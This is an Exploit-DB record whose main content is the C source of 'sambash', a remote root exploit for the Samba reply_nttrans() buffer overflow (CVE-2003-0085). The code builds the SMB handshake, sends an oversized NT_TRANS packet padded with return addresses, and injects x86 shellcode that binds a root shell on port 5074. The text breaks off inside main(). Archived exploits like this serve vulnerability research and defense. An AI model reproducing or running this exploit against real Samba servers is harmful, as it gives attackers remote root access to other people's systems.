{"id": "EDB-ID:22356", "hash": "4ae5f785518ecf0047c45c4f79ae4528", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Samba SMB 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow Vulnerability", "description": "Samba SMB 2.2.x,CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow Vulnerability. CVE-2003-0085. Remote exploit for unix platform", "published": "2003-03-15T00:00:00", "modified": "2003-03-15T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/22356/", "reporter": "flatline", "references": [], "cvelist": ["CVE-2003-0085"], "lastseen": "2016-02-02T18:33:56", "history": [], "viewCount": 7, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2016-02-02T18:33:56"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2003-0085"]}, {"type": "nessus", "idList": ["SAMBA_TNG_FLAWS.NASL", "MANDRAKE_MDKSA-2003-032.NASL", "SAMBA_FRAGS_OVERFLOW.NASL", "DEBIAN_DSA-262.NASL", "REDHAT-RHSA-2003-096.NASL"]}, {"type": "osvdb", "idList": ["OSVDB:11800", "OSVDB:6323"]}, {"type": "canvas", "idList": ["SAMBA_NTTRANS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82287"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:4272", "SECURITYVULNS:DOC:4217"]}, {"type": "exploitdb", "idList": ["EDB-ID:9936", "EDB-ID:16321"]}, {"type": "debian", "idList": ["DEBIAN:DSA-262-1:0FA36"]}, {"type": "suse", "idList": ["SUSE-SA:2003:015", "SUSE-SA:2003:016"]}, {"type": "openvas", "idList": ["OPENVAS:53860"]}, {"type": "cert", "idList": ["VU:267873", "VU:958321", "VU:298233"]}], "modified": "2016-02-02T18:33:56"}, "vulnersScore": 8.4}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/22356/", "sourceData": "/*\r\nsource: http://www.securityfocus.com/bid/7106/info\r\n\r\nSamba is prone to a buffer-overflow vulnerability when the 'smbd' service tries to reassemble specially crafted SMB/CIFS packets. \r\n\r\nAn attacker can exploit this vulnerability by creating a specially formatted SMB/CIFS packet and sending it to a vulnerable Samba server. The overflow condition will be triggered and will cause smbd to overwrite sensitive areas of memory with attacker-supplied values. \r\n\r\nNote that the smbd service runs with root privileges.\r\n*/\r\n\r\n/**\r\n ** sambash -- samba <= 2.2.7a reply_nttrans() linux x86 remote root\r\nexploit by flatline@blackhat.nl\r\n **\r\n ** since we fully control a memcpy(), our options are endless here. i've\r\nchosen to go the stack route tho,\r\n ** because any heap method would've required too much brute forcing or\r\nwould've required the ugly use of targets.\r\n **\r\n ** the stack method still requires little brute forcing and obviously\r\nwill not survive PaX, but it's efficient.\r\n ** i'm using executable rets as a 'jmp sled' which jmp to the shellcode\r\nto help improve our brute forcing chances a bit.\r\n **\r\n ** shouts to (#)0dd, #!l33tsecurity and #!xpc.\r\n **\r\n ** many thanks to tcpdump which had to suffer the torture i put it\r\nthrough and often didn't survive (more to come?).\r\n **\r\n ** public/private, i don't give a shit.\r\n **\r\n **/\r\n\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n#include <netdb.h>\r\n#include <errno.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <unistd.h>\r\n#include <stdlib.h>\r\n#include <ctype.h>\r\n#include <signal.h>\r\n\r\ntypedef unsigned char uint8;\r\ntypedef unsigned short uint16;\r\ntypedef unsigned long uint32;\r\n\r\n/* http://ubiqx.org/cifs/SMB.html, CIFS-TR-1p00_FINAL.pdf,\r\nsmb_cifs_protocol.pdf,\r\n http://www.ubiqx.org/cifs/rfc-draft/rfc1001.html#s14,\r\nhttp://www.ubiqx.org/cifs/rfc-draft/rfc1002.html#s4.3.2 */\r\n\r\n// XXX: lelijkheid: vermijd word padding door hier byte arrays van te\r\nmaken.\r\nstruct variable_data_header\r\n{ uint8 wordcount, bytecount[2];\r\n};\r\n\r\nstruct nbt_session_header\r\n{ uint8 type, flags, len[2];\r\n};\r\n\r\nstruct smb_base_header\r\n{ uint8 protocol[4], command, errorclass, reserved, errorcode[2];\r\n uint8 flags;\r\n uint8 flags2[2], reserved2[12], tid[2], pid[2], uid[2], mid[2];\r\n};\r\n\r\nstruct negprot_reply_header\r\n{ uint8 wordcount;\r\n uint8 dialectindex[2];\r\n uint8 securitymode;\r\n uint16 maxmpxcount, maxvccount;\r\n uint32 maxbufsize, maxrawsize, sessionid, capabilities, timelow,\r\ntimehigh;\r\n uint16 timezone;\r\n uint8 keylen;\r\n uint16 bytecount;\r\n};\r\n\r\n// omdat we ipasswdlen en passwdlen meegeven is wordcount altijd 13 voor\r\ndeze header.\r\nstruct sesssetupx_request_header\r\n{ uint8 wordcount, command, reserved;\r\n uint8 offset[2], maxbufsize[2], maxmpxcount[2], vcnumber[2];\r\n uint8 sessionid[4];\r\n uint8 ipasswdlen[2], passwdlen[2];\r\n uint8 reserved2[4], capabilities[4];\r\n};\r\n\r\nstruct sesssetupx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], action[2],\r\nbytecount[2];\r\n // wat volgt: char nativeos[], nativelanman[], primarydomain[];\r\n};\r\n\r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2],\r\npasswdlen[2], bytecount[2];\r\n // uint16 bytecount geeft lengte van volgende fields aan: char\r\npassword[], path[], service[];\r\n};\r\n\r\nstruct tconx_reply_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], supportbits[2],\r\nbytecount[2];\r\n // wat volgt: char service[], char nativefilesystem[];\r\n};\r\n\r\n// verschilt van trans en trans2 door de 32 bits wijde header fields.\r\nstruct nttrans_primary_request_header\r\n{ uint8 wordcount, maxsetupcount, flags[2], totalparamcount[4],\r\ntotaldatacount[4], maxparamcount[4], maxdatacount[4];\r\n uint8 paramcount[4], paramoffset[4], datacount[4], dataoffset[4],\r\nsetupcount, function[2], bytecount[2];\r\n};\r\n\r\nstruct nttrans_secondary_request_header\r\n{ uint8 pad[4], totalparamcount[4], totaldatacount[4], paramcount[4],\r\nparamoffset[4], paramdisplace[4],\r\n datacount[4], dataoffset[4], datadisplace[4];\r\n};\r\n\r\n/* struct trans2_request_header\r\n{ uint8 wordcount;\r\n int totalparamcount, totaldatacount, maxparamcount, maxdatacount;\r\n uint8 maxsetupcount[2], flags[2];\r\n uint8 timeout[4];\r\n int reserved2, paramcount, paramoffset, datacount, dataoffset, fid;\r\n uint8 setupcount[2], bytecount[2];\r\n}; */\r\n\r\nstruct trans2_reply_header\r\n{ uint8 wordcount;\r\n uint16 totalparamcount, totaldatacount, reserved, paramcount,\r\nparamoffset,\r\n paramdisplacement, datacount, dataoffset, datadisplacement;\r\n uint8 setupcount, reserved2;\r\n uint16 bytecount;\r\n};\r\n\r\n#define SMBD_PORT 139\r\n#define SHELLCODE_PORT 5074\r\n\r\n#define SMB_NEGPROT 0x72\r\n#define SMB_SESSSETUPX 0x73\r\n#define SMB_TCONX 0x75\r\n#define SMB_TRANS2 0x32\r\n#define SMB_NTTRANS1 0xA0\r\n#define SMB_NTTRANS2 0xA1\r\n#define SMB_NTTRANSCREATE 0x01\r\n#define SMB_TRANS2OPEN 0x00\r\n#define SMB_SESSIONREQ 0x81\r\n#define SMB_SESSION 0x00\r\n\r\n#define STACKBOTTOM 0xbfffffff\r\n#define STACKBASE 0xbfffd000\r\n#define TOTALCOUNT ((int)(STACKBOTTOM - STACKBASE))\r\n#define BRUTESTEP 5120\r\n\r\nextern char *optarg;\r\nextern int optind, errno, h_errno;\r\n\r\nuint16 tid, pid, uid;\r\nuint32 sessionid, PARAMBASE = 0x81c0000;\r\nchar *tconx_servername;\r\nint userbreak = 0;\r\n\r\nchar shellcode[] =\r\n\"\\x31\\xc0\\x50\\x40\\x89\\xc3\\x50\\x40\\x50\\x89\\xe1\\xb0\\x66\\xcd\\x80\\x31\\xd2\\x52\"\r\n\\\r\n\r\n\"\\x66\\x68\\x13\\xd2\\x43\\x66\\x53\\x89\\xe1\\x6a\\x10\\x51\\x50\\x89\\xe1\\xb0\\x66\\xcd\"\r\n\\\r\n\r\n\"\\x80\\x40\\x89\\x44\\x24\\x04\\x43\\x43\\xb0\\x66\\xcd\\x80\\x83\\xc4\\x0c\\x52\\x52\\x43\"\r\n\\\r\n\r\n\"\\xb0\\x66\\xcd\\x80\\x93\\x89\\xd1\\xb0\\x3f\\xcd\\x80\\x41\\x80\\xf9\\x03\\x75\\xf6\\x52\"\r\n\\\r\n\r\n\"\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x52\\x53\\x89\\xe1\\xb0\\x0b\"\r\n \"\\xcd\\x80\";\r\n\r\n// ach, 't kan ermee door.\r\nchar *netbios_encode_name(char *name, int type)\r\n{ char plainname[16], c, *encoded, *ptr;\r\n int i, len = strlen(name);\r\n if ((encoded = malloc(34)) == NULL)\r\n { fprintf(stderr, \"malloc() failed\\n\");\r\n exit(-1);\r\n }\r\n ptr = encoded;\r\n strncpy(plainname, name, 15);\r\n *ptr++ = 0x20;\r\n for (i = 0; i < 16; i++)\r\n { if (i == 15) c = type;\r\n else\r\n { if (i < len) c = toupper(plainname[i]);\r\n else c = 0x20;\r\n }\r\n *ptr++ = (((c >> 4) & 0xf) + 0x41);\r\n *ptr++ = ((c & 0xf) + 0x41);\r\n }\r\n *ptr = '\\0';\r\n return encoded;\r\n}\r\n\r\nvoid construct_nbt_session_header(char *ptr, uint8 type, uint8 flags,\r\nuint32 len)\r\n{ struct nbt_session_header *nbt_hdr = (struct nbt_session_header *)ptr;\r\n uint16 nlen;\r\n\r\n// geen idee of dit de juiste manier is, maar 't lijkt wel te werken ..\r\n if (len > 65535) nlen = 65535;\r\n else nlen = htons(len);\r\n\r\n memset((void *)nbt_hdr, '\\0', sizeof (struct nbt_session_header));\r\n\r\n nbt_hdr->type = type;\r\n nbt_hdr->flags = flags;\r\n memcpy(&nbt_hdr->len, &nlen, sizeof (uint16));\r\n}\r\n\r\n// caller zorgt voor juiste waarde van ptr.\r\nvoid construct_smb_base_header(char *ptr, uint8 command, uint8 flags,\r\nuint16 flags2, uint16 tid, uint16 pid,\r\n uint16 uid, uint16 mid)\r\n{ struct smb_base_header *base_hdr = (struct smb_base_header *)ptr;\r\n\r\n memset(base_hdr, '\\0', sizeof (struct smb_base_header));\r\n\r\n memcpy(base_hdr->protocol, \"\\xffSMB\", 4);\r\n\r\n base_hdr->command = command;\r\n base_hdr->flags = flags;\r\n\r\n memcpy(&base_hdr->flags2, &flags2, sizeof (uint16));\r\n memcpy(&base_hdr->tid, &tid, sizeof (uint16));\r\n memcpy(&base_hdr->pid, &pid, sizeof (uint16));\r\n memcpy(&base_hdr->uid, &uid, sizeof (uint16));\r\n memcpy(base_hdr->mid, &mid, sizeof (uint16));\r\n}\r\n\r\nvoid construct_sesssetupx_header(char *ptr)\r\n{ struct sesssetupx_request_header *sx_hdr = (struct\r\nsesssetupx_request_header *)ptr;\r\n uint16 maxbufsize = 0xffff, maxmpxcount = 2, vcnumber = 31257, pwdlen =\r\n0;\r\n uint32 capabilities = 0x50;\r\n\r\n memset(sx_hdr, '\\0', sizeof (struct sesssetupx_request_header));\r\n\r\n sx_hdr->wordcount = 13;\r\n sx_hdr->command = 0xff;\r\n memcpy(&sx_hdr->maxbufsize, &maxbufsize, sizeof (uint16));\r\n memcpy(&sx_hdr->vcnumber, &vcnumber, sizeof (uint16));\r\n memcpy(&sx_hdr->maxmpxcount, &maxmpxcount, sizeof (uint16));\r\n memcpy(&sx_hdr->sessionid, &sessionid, sizeof (uint32));\r\n memcpy(&sx_hdr->ipasswdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->passwdlen, &pwdlen, sizeof (uint16));\r\n memcpy(&sx_hdr->capabilities, &capabilities, sizeof (uint32));\r\n}\r\n\r\n/*\r\nstruct tconx_request_header\r\n{ uint8 wordcount, xcommand, xreserved, xoffset[2], flags[2],\r\npasswdlen[2], bytecount[2];\r\n -- uint16 bytecount geeft lengte van volgende fields aan: char\r\npassword[], path[], service[];\r\n}; */\r\nvoid construct_tconx_header(char *ptr)\r\n{ struct tconx_request_header *tx_hdr = (struct tconx_request_header\r\n*)ptr;\r\n uint16 passwdlen = 1, bytecount;\r\n char *data;\r\n\r\n memset(tx_hdr, '\\0', sizeof (struct tconx_request_header));\r\n\r\n bytecount = strlen(tconx_servername) + 15;\r\n\r\n if ((data = malloc(bytecount)) == NULL)\r\n { fprintf(stderr, \"malloc() failed, aborting!\\n\");\r\n exit(-1);\r\n }\r\n memcpy(data, \"\\x00\\x5c\\x5c\", 3);\r\n memcpy(data + 3, tconx_servername, strlen(tconx_servername));\r\n memcpy(data + 3 + strlen(tconx_servername),\r\n\"\\x5cIPC\\x24\\x00\\x3f\\x3f\\x3f\\x3f\\x3f\\x00\", 12);\r\n\r\n tx_hdr->wordcount = 4;\r\n tx_hdr->xcommand = 0xff;\r\n\r\n memcpy(&tx_hdr->passwdlen, &passwdlen, sizeof (uint16));\r\n memcpy(&tx_hdr->bytecount, &bytecount, sizeof (uint16));\r\n\r\n// zorg ervoor dat er genoeg ruimte in het packet is om dit erachter te\r\nkunnen plakken.\r\n memcpy(ptr + sizeof (struct tconx_request_header), data, bytecount);\r\n}\r\n\r\n// session request versturen.\r\nvoid nbt_session_request(int fd, char *clientname, char *servername)\r\n{ char *cn, *sn;\r\n char packet[sizeof (struct nbt_session_header) + (34 * 2)];\r\n\r\n construct_nbt_session_header(packet, SMB_SESSIONREQ, 0, sizeof (packet) -\r\nsizeof (struct nbt_session_header));\r\n\r\n tconx_servername = servername;\r\n\r\n sn = netbios_encode_name(servername, 0x20);\r\n cn = netbios_encode_name(clientname, 0x00);\r\n\r\n memcpy(packet + sizeof (struct nbt_session_header), sn, 34);\r\n memcpy(packet + (sizeof (struct nbt_session_header) + 34), cn, 34);\r\n\r\n if (write(fd, packet, sizeof (packet)) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n\r\n free(cn);\r\n free(sn);\r\n}\r\n\r\n// netjes verwerken, zoals het hoort.\r\nvoid process_nbt_session_reply(int fd)\r\n{ struct nbt_session_header nbt_hdr;\r\n char *errormsg;\r\n uint8 errorcode;\r\n int size, len = 0;\r\n\r\n if ((size = read(fd, &nbt_hdr, sizeof (nbt_hdr))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n if (size != sizeof (nbt_hdr))\r\n { close(fd);\r\n fprintf(stderr, \"read() a broken packet, aborting.\\n\");\r\n exit(-1);\r\n }\r\n memcpy(&len, &nbt_hdr.len, sizeof (uint16));\r\n\r\n if (len)\r\n { read(fd, (void *)&errorcode, 1);\r\n close(fd);\r\n switch (errorcode)\r\n { case 0x80 : errormsg = \"Not listening on called name\"; break;\r\n case 0x81 : errormsg = \"Not listening for calling name\"; break;\r\n case 0x82 : errormsg = \"Called name not present\"; break;\r\n case 0x83 : errormsg = \"Called name present, but insufficient\r\nresources\"; break;\r\n case 0x8f : errormsg = \"Unspecified error\"; break;\r\n default : errormsg = \"Unspecified error (unknown error code received!)\";\r\nbreak;\r\n }\r\n fprintf(stderr, \"session request denied, reason: '%s' (code %i)\\n\",\r\nerrormsg, errorcode);\r\n exit(-1);\r\n }\r\n printf(\"session request granted\\n\");\r\n}\r\n\r\nvoid negprot_request(int fd)\r\n{ struct variable_data_header data;\r\n char dialects[] = \"\\x2PC NETWORK PROGRAM 1.0\\x0\\x2MICROSOFT NETWORKS\r\n1.03\\x0\\x2MICROSOFT NETWORKS 3.0\\x0\\x2LANMAN1.0\\x0\" \\\r\n \"\\x2LM1.2X002\\x0\\x2Samba\\x0\\x2NT LANMAN 1.0\\x0\\x2NT LM\r\n0.12\\x0\\x2\"\"FLATLINE'S KWAADWAAR\";\r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct\r\nsmb_base_header) + sizeof (data) + sizeof (dialects)];\r\n int dlen = htons(sizeof (dialects));\r\n\r\n memset(&data, '\\0', sizeof (data));\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) -\r\nsizeof (struct nbt_session_header));\r\n pid = getpid();\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header),\r\nSMB_NEGPROT, 8, 1, 0, pid, 0, 1);\r\n\r\n memcpy(&data.bytecount, &dlen, sizeof (uint16));\r\n\r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct\r\nsmb_base_header)), &data, sizeof (data));\r\n memcpy(packet + (sizeof (struct nbt_session_header) + sizeof (struct\r\nsmb_base_header) + sizeof (data)),\r\n dialects, sizeof (dialects));\r\n\r\n if (write(fd, packet, sizeof (packet)) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n}\r\n\r\nvoid process_negprot_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct negprot_reply_header *np_reply_hdr;\r\n char packet[1024];\r\n int size;\r\n uint16 pid_reply;\r\n\r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct\r\nnbt_session_header));\r\n np_reply_hdr = (struct negprot_reply_header *)(packet + (sizeof (struct\r\nnbt_session_header) +\r\n sizeof (struct smb_base_header)));\r\n\r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n\r\n // bekijk het antwoord even vluchtig.\r\n memcpy(&pid_reply, &base_hdr->pid, sizeof (uint16));\r\n memcpy(&sessionid, &np_reply_hdr->sessionid, sizeof (uint32));\r\n if (base_hdr->command != SMB_NEGPROT || np_reply_hdr->wordcount != 17 ||\r\npid_reply != pid)\r\n { close(fd);\r\n fprintf(stderr, \"protocol negotiation failed\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"protocol negotiation complete\\n\");\r\n}\r\n\r\nvoid sesssetupx_request(int fd)\r\n{ uint8 data[] = \"\\x12\\x0\\x0\\x0\\x55\\x6e\\x69\\x78\\x00\\x53\\x61\\x6d\\x62\\x61\";\r\n char packet[sizeof (struct nbt_session_header) + sizeof (struct\r\nsmb_base_header) +\r\n sizeof (struct sesssetupx_request_header) + sizeof (data)];\r\n int size;\r\n\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) -\r\nsizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header),\r\nSMB_SESSSETUPX, 8, 1, 0, pid, 0, 1);\r\n construct_sesssetupx_header(packet + sizeof (struct nbt_session_header) +\r\nsizeof (struct smb_base_header));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct\r\nsmb_base_header) +\r\n sizeof (struct sesssetupx_request_header), &data, sizeof (data));\r\n\r\n if ((size = write(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n if (size != sizeof (packet))\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n }\r\n}\r\n\r\nvoid process_sesssetupx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct sesssetupx_reply_header *sx_hdr;\r\n char packet[1024];\r\n int size, len;\r\n\r\n// lees het packet\r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n\r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct\r\nnbt_session_header));\r\n sx_hdr = (struct sesssetupx_reply_header *)(packet + sizeof (struct\r\nnbt_session_header) + sizeof (struct smb_base_header));\r\n\r\n memcpy(&len, &nbt_hdr->len, sizeof (uint16));\r\n memcpy(&uid, &base_hdr->uid, sizeof (uint16));\r\n\r\n// even een vluchtige check\r\n if (sx_hdr->xcommand != 0xff && sx_hdr->wordcount != 3)\r\n { close(fd);\r\n fprintf(stderr, \"session setup failed\\n\");\r\n exit(-1);\r\n }\r\n\r\n printf(\"session setup complete, got assigned uid %i\\n\", uid);\r\n}\r\n\r\nvoid tconx_request(int fd)\r\n{ // geen fixed size buffer omdat we met dynamische data te maken hebben\r\n(variabele servernaam)\r\n char *packet;\r\n int size, pktsize = sizeof (struct nbt_session_header) + sizeof (struct\r\nsmb_base_header) +\r\n sizeof (struct tconx_request_header) + strlen(tconx_servername) + 15;\r\n\r\n if ((packet = malloc(pktsize)) == NULL)\r\n { close(fd);\r\n fprintf(stderr, \"malloc() failed, aborting!\\n\");\r\n exit(-1);\r\n }\r\n\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, pktsize - sizeof\r\n(struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header),\r\nSMB_TCONX, 8, 1, 0, pid, uid, 1);\r\n construct_tconx_header(packet + sizeof (struct nbt_session_header) +\r\nsizeof (struct smb_base_header));\r\n\r\n if ((size = write(fd, packet, pktsize)) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n\r\n free(packet);\r\n\r\n if (size != pktsize)\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n }\r\n}\r\n\r\nvoid process_tconx_reply(int fd)\r\n{ struct nbt_session_header *nbt_hdr;\r\n struct smb_base_header *base_hdr;\r\n struct tconx_reply_header *tx_hdr;\r\n char packet[1024];\r\n int size, bytecount;\r\n\r\n// lees het packet\r\n if ((size = read(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"read() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n\r\n nbt_hdr = (struct nbt_session_header *)packet;\r\n base_hdr = (struct smb_base_header *)(packet + sizeof (struct\r\nnbt_session_header));\r\n tx_hdr = (struct tconx_reply_header *)(packet + sizeof (struct\r\nnbt_session_header) + sizeof (struct smb_base_header));\r\n\r\n memcpy(&tid, &base_hdr->tid, sizeof (uint16));\r\n memcpy(&bytecount, &tx_hdr->bytecount, sizeof (uint16));\r\n\r\n printf(\"tree connect complete, got assigned tid %i\\n\", tid);\r\n}\r\n\r\nvoid nttrans_primary_request(int fd)\r\n{ char packet[sizeof (struct nbt_session_header) + sizeof (struct\r\nsmb_base_header) +\r\n sizeof (struct nttrans_primary_request_header)];\r\n struct nttrans_primary_request_header nt_hdr;\r\n\r\n int size, function = SMB_NTTRANSCREATE, totalparamcount = TOTALCOUNT,\r\ntotaldatacount = 0;\r\n uint8 setupcount = 0;\r\n\r\n memset(&nt_hdr, '\\0', sizeof (nt_hdr));\r\n\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) -\r\nsizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header),\r\nSMB_NTTRANS1, 8, 1, tid, pid, uid, 1);\r\n\r\n nt_hdr.wordcount = 19 + setupcount;\r\n memcpy(&nt_hdr.function, &function, sizeof (uint16));\r\n\r\n memcpy(&nt_hdr.totalparamcount, &totalparamcount, sizeof (uint32));\r\n memcpy(&nt_hdr.totaldatacount, &totaldatacount, sizeof (uint32));\r\n\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct\r\nsmb_base_header), &nt_hdr, sizeof (nt_hdr));\r\n\r\n if ((size = write(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n if (size != sizeof (packet))\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n }\r\n}\r\n\r\n// hier gaat het gebeuren.\r\n/*\r\nstruct nttrans_secondary_request_header\r\n{ uint8 pad[3], totalparamcount[4], totaldatacount[4], paramcount[4],\r\nparamoffset[4], paramdisplace[4],\r\n datacount[4], dataoffset[4], datadisplace[4];\r\n}; */\r\nvoid nttrans_secondary_request(int fd)\r\n{ char retbuf[TOTALCOUNT], packet[sizeof (struct nbt_session_header) +\r\nsizeof (struct smb_base_header) +\r\n sizeof (struct nttrans_secondary_request_header) + TOTALCOUNT];\r\n struct nttrans_secondary_request_header nt_hdr;\r\n unsigned long retaddr, jmptocode = 0x9090a1eb; // jmptocode = 0x90909ceb;\r\n int i;\r\n\r\n int size, totalparamcount = TOTALCOUNT, totaldatacount = 0,\r\n paramcount = TOTALCOUNT, datacount = 0, paramdisplace = STACKBASE -\r\nPARAMBASE,\r\n datadisplace = 0, paramoffset = 68, dataoffset = 0;\r\n\r\n memset(&nt_hdr, '\\0', sizeof (nt_hdr));\r\n retaddr = 0xbffff6eb;\r\n for (i = 0; i < TOTALCOUNT; i += 4)\r\n { if (i == 0x100)\r\n { memcpy(retbuf + i, &jmptocode, 4);\r\n }\r\n else memcpy(retbuf + i, &retaddr, 4);\r\n }\r\n\r\n// memset(shellcode, 0xCC, sizeof (shellcode));\r\n memcpy(retbuf + 0x100 - sizeof (shellcode), shellcode, sizeof\r\n(shellcode));\r\n\r\n printf(\"sizeof packet: %i, parambase: 0x%08lx\\n\", sizeof (packet),\r\nPARAMBASE);\r\n\r\n construct_nbt_session_header(packet, SMB_SESSION, 0, sizeof (packet) -\r\nsizeof (struct nbt_session_header));\r\n construct_smb_base_header(packet + sizeof (struct nbt_session_header),\r\nSMB_NTTRANS2, 8, 1, tid, pid, uid, 1);\r\n\r\n memcpy(&nt_hdr.totalparamcount, &totalparamcount, sizeof (uint32));\r\n memcpy(&nt_hdr.totaldatacount, &totaldatacount, sizeof (uint32));\r\n memcpy(&nt_hdr.paramcount, &paramcount, sizeof (uint32));\r\n memcpy(&nt_hdr.datacount, &datacount, sizeof (uint32));\r\n memcpy(&nt_hdr.paramdisplace, &paramdisplace, sizeof (uint32));\r\n memcpy(&nt_hdr.datadisplace, &datadisplace, sizeof (uint32));\r\n memcpy(&nt_hdr.paramoffset, &paramoffset, sizeof (uint32));\r\n memcpy(&nt_hdr.dataoffset, &dataoffset, sizeof (uint32));\r\n\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct\r\nsmb_base_header), &nt_hdr, sizeof (nt_hdr));\r\n memcpy(packet + sizeof (struct nbt_session_header) + sizeof (struct\r\nsmb_base_header) + sizeof (nt_hdr), retbuf, sizeof (retbuf));\r\n\r\n usleep(5000);\r\n\r\n if ((size = write(fd, packet, sizeof (packet))) == -1)\r\n { close(fd);\r\n fprintf(stderr, \"write() failed, reason: '%s' (code %i)\\n\",\r\nstrerror(errno), errno);\r\n exit(-errno);\r\n }\r\n if (size != sizeof (packet))\r\n { close(fd);\r\n fprintf(stderr, \"couldn't write entire packet, aborting!\\n\");\r\n exit(-1);\r\n }\r\n fprintf(stderr, \"secondary nttrans packet sent!\\n\");\r\n}\r\n\r\n// voor alle idioten onder ons.\r\nvoid usage(char *name)\r\n{ printf(\"\\nusage: %s -h hostname [-p port] -t target [-l]\\n\\n-h\\tspecify\r\ntarget hostname\\n-p\\tspecify target \" \\\r\n \"port (defaults to 139)\\n-t\\tspecify target's magic numbers\\n-l\\tshow\r\nlist of targets\\n\\n\", name);\r\n}\r\n\r\nvoid userbreak_handler(int x)\r\n{ userbreak = 1;\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{ int fd, port = -1, opt, readlen;\r\n unsigned long target_ip;\r\n struct sockaddr_in s_in;\r\n struct hostent *he;\r\n char *host = NULL, *me, readbuf[4096];\r\n fd_set readfds;\r\n\r\n if (argc >= 1)\r\n { me = argv[0];\r\n if (strchr(me, '/') != NULL) me = strrchr(me, '/') + 1;\r\n }\r\n else me = \"sambash\";\r\n\r\n fprintf(stderr, \"\\nsambash -- samba <= 2.2.7a reply_nttrans() linux x86\r\nremote root exploit by flatline@blackhat.nl\\n\\n\");\r\n\r\n while ((opt = getopt(argc, argv, \"h:p:b:\")) != EOF)\r\n { switch (opt)\r\n { case 'h': { if (!inet_aton(optarg, (struct in_addr *)&target_ip))\r\n { if ((he = gethostbyname(optarg)) == NULL)\r\n { fprintf(stderr, \"unable to resolve host '%s', reason: %s (code\r\n%i)\\n\", optarg, hstrerror(h_errno), h_errno);\r\n exit(-h_errno);\r\n }\r\n memcpy((void *)&target_ip, he->h_addr_list[0], he->h_length);\r\n }\r\n host = optarg;\r\n } break;\r\n case 'p': { port = atoi(optarg);\r\n if (port < 0 || port > 65535)\r\n { fprintf(stderr, \"invalid port specified.\\n\");\r\n exit(-1);\r\n }\r\n } break;\r\n case 'b': PARAMBASE += atoi(optarg); break;\r\n default : { usage(me);\r\n exit(0);\r\n } break;\r\n }\r\n }\r\n\r\n if (host == NULL)\r\n { fprintf(stderr, \"no hostname specified.\\n\");\r\n usage(me);\r\n 